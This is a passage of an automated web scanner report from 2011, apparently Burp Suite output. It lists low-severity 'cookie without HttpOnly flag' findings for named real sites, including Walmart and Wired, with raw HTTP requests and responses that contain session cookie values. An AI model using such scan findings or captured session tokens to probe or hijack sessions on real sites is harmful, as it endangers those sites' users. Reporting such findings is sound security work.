Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420087%3atrue%3afalse%3a0%3amBXTv1vHzAp04ze95g3yWJHphRs%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29719


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.20. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_TeenVogue

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_TeenVogue

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_TeenVogue HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:25 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000G-x9BjqxoEAPW6PZDfPnvF5:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:06 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fBH%0aLqxAiny5LrVz%2bboJL8AQ0naDA20QdjfAXxC134f7Jz1m3YvhRQzvjNwXQt%2f68io%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420099%3atrue%3afalse%3a0%3aYqj2GK49LEs6noC6BEQI39oGsjk%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29857


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.21. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_VanityFair

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_VanityFair

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_VanityFair HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:01 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000xw9XDCR-rSohWzeYpltKY-H:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:52 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fDL%0aRtcOX7vAUdLq6Hq4AWZJug3ter6Ve1vDGMgmhvF0ReSmeomwIBRyvlOp7VmTrkc%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420151%3atrue%3afalse%3a0%3azcJlgswaOZvisfczfqgW4YNNQxo%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29925


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.22. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Vogue

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Vogue

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Vogue HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:20 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=000077AvQ5emcOSox5imPZuSXqf:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:00 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fAM%0a7ZiVQobgmG6AiURqTuhruWAd40Qhy2PGdMvGtTU6F1PZxSPdsjjJkMU9jkcblHU%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420159%3atrue%3afalse%3a0%3ac4wFYold1FoX5flDzeXNYHnayJw%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29758


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.23. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_W

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_W

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_W HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:25 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Vhby-bpIpWQ2UcIyMe80vlp:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:17 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0a9%0a20%2fejh7prtVltEMryh1brZCRsLLaPkaMe8Akhmqi39JY7u9vjrKp02H5AlUQE7E%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419835%3atrue%3afalse%3a0%3aCFEfewzTmdxWTKG7j05ZJskj1Zs%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29935


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.24. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Wired

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Wired

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Wired HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:36 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000kzU6rJKyKppPAMaRGuijmYh:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:17 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fDt%0aoJJmfmiKMqLpgwDfHCXGni13qTu0LfcLGqCDRlYqKtYD3XcqH1hYJGauy1R%2fYxU%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420176%3atrue%3afalse%3a0%3a5KRoPYNZ6oweqAaKlufu18E0nIQ%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29856


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.25. http://www.sentinelinvestments.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sentinelinvestments.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sentinelinvestments.com

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 14:07:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head>
   <l
...[SNIP]...

11.26. http://www.tukui.org/v2/forums/register.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tukui.org
Path:   /v2/forums/register.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v2/forums/register.php HTTP/1.1
Host: www.tukui.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 14:59:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=rnddj5jg2uaifkgegn80melko7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6325
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/xfn/11">
<meta
...[SNIP]...

11.27. http://www.walmart.com/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.walmart.com
Path:   /x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22 HTTP/1.1
Host: www.walmart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: max-age=0
Last-Modified: Wed, 12 Jan 2011 15:26:32 GMT
Expires: Wed, 12 Jan 2011 15:26:32 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 15:26:33 GMT
Content-Length: 11881
Connection: close
Set-Cookie: cef.env=PROD; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.visitor=12724351807; Domain=.walmart.com; Expires=Sat, 09-Jan-2021 15:26:32 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.visitor:12724351807|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.anoncart=127243518071209880; Domain=.walmart.com; Expires=Sat, 09-Jan-2021 15:26:32 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.anoncart:127243518071209880|:|com.wm.visitor:12724351807|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: WMSessionID=00000005b4cc9e333fe1fb52cda733673fedc1581bb3a0ce_1294845992827_SSL203_10-15-97-102_1294845992827_10.95_N_; Domain=.walmart.com; Path=/
Set-Cookie: cef.env=PROD+B++H++D++Y+%3Fcat%3D3891+C+; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.reflector="reflectorid:0000000000000000000000@lastupd:1294845992829@firstcreate:1294845992829"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc=ffffffff090726f145525d5f4f58455e445a4a423660;path=/
Set-Cookie: dcenv=ndc; path=/; domain=walmart.com
Via: HTTP/1.1 nw307 (nw307_7330869248_73610240)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title> - Walmart</title>
<link href="http://i2.walmartimages.com/css/global.css"
...[SNIP]...

11.28. http://www.wired.com/services/corrections/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/corrections/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/corrections/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Wed, 12 Jan 2011 15:41:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:41:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=acbAOmv50QXE_5DZY461s; path=/
Content-Length: 54310


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

11.29. http://www.wired.com/services/newsletters

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/newsletters

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/newsletters HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Wed, 12 Jan 2011 15:41:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:41:04 GMT
Content-Length: 31938
Connection: close
Set-Cookie: JSESSIONID=acbKlmpgDx9HsdHJY461s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

11.30. http://www.wired.com/user/login

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/login HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/login
Content-Length: 73
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:04:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:04:42 GMT
Connection: close
Set-Cookie: JSESSIONID=abcOkB-090FYf89-iN41s; path=/

The URL has moved <a href="https://secure.wired.com/user/login">here</a>

11.31. http://www.wired.com/user/logout

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/logout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/logout HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/logout
Content-Length: 74
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:04:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:04:46 GMT
Connection: close
Set-Cookie: JSESSIONID=cabyqTOw1aWnFbl3jN41s; path=/

The URL has moved <a href="https://secure.wired.com/user/logout">here</a>

11.32. http://www.wired.com/user/registration

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/registration

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/registration HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/registration
Content-Length: 80
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:04:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=abcPb5WLVvrzQ952mN41s; path=/

The URL has moved <a href="https://secure.wired.com/user/registration">here</a>

11.33. http://ad.crwdcntrl.net/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.crwdcntrl.net
Path:   /4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json?_=1294610289454 HTTP/1.1
Host: ad.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cc=ctst

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:00:25 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: OAID=fc847ad45efbbb25655a2972638271b3; Domain=.crwdcntrl.net; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
Content-Length: 62

CN.ad.lotame.tags={"Profile": {"Audiences": {"Audience":[]}}};

11.34. http://ad.doubleclick.net/activity

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /activity;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613?&_dc_ck=try HTTP/1.1
Accept: */*
